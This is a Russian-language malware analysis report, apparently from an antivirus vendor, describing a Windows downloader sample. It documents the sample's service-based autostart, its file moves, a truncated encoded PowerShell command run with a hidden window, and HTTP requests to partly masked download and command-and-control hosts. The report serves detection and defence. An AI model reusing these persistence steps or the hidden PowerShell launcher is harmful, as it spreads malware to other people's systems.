Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\NlsData000a] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData000a] 'ImagePath' = '"%WINDIR%\SysWOW64\qdv\NlsData000a.exe"'
Создает следующие сервисы
- 'NlsData000a' "%WINDIR%\SysWOW64\qdv\NlsData000a.exe"
- 'NlsData000a' %WINDIR%\SysWOW64\qdv\NlsData000a.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAFEAWQBKAFUAcABwAG0APQAnAFcASwBPAFkATwB6AHcAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAFUAYABSAGkAYABUAFkAUABSAG8AVABgAG8AYwBPAGwAIgAgAD...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\659.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\qdv\nlsdata000a.exe
Перемещает следующие файлы
- %HOMEPATH%\659.exe в %WINDIR%\syswow64\qdv\nlsdata000a.exe
Сетевая активность
Подключается к
- '14#.#05.151.124':443
TCP
Запросы HTTP GET
- http://mu###rental.com/wp-includes/uwr_u4_ed3qzbb/
- http://lt##bus.com/cgi-bin/mff_xao9d_5ld5qajfmx/
- http://my###gen.org/_db_backups/t_e_v7qizcr2/
- http://my###nerd.com/bluesforsale/zi6_v4g0_rmyg/
Запросы HTTP POST
- http://14#.##5.151.124:443/Jd6qG/P6G5eGhoLV7vRqE/ via 14#.#05.151.124
UDP
- DNS ASK mu###rental.com
- DNS ASK lt##bus.com
- DNS ASK my###gen.org
- DNS ASK my###nerd.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\659.exe'
- '%WINDIR%\syswow64\qdv\nlsdata000a.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAFEAWQBKAFUAcABwAG0APQAnAFcASwBPAFkATwB6AHcAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAFUAYABSAGkAYABUAFkAUABSAG8AVABgAG8AYwBPAGwAIgAgAD...' (со скрытым окном)
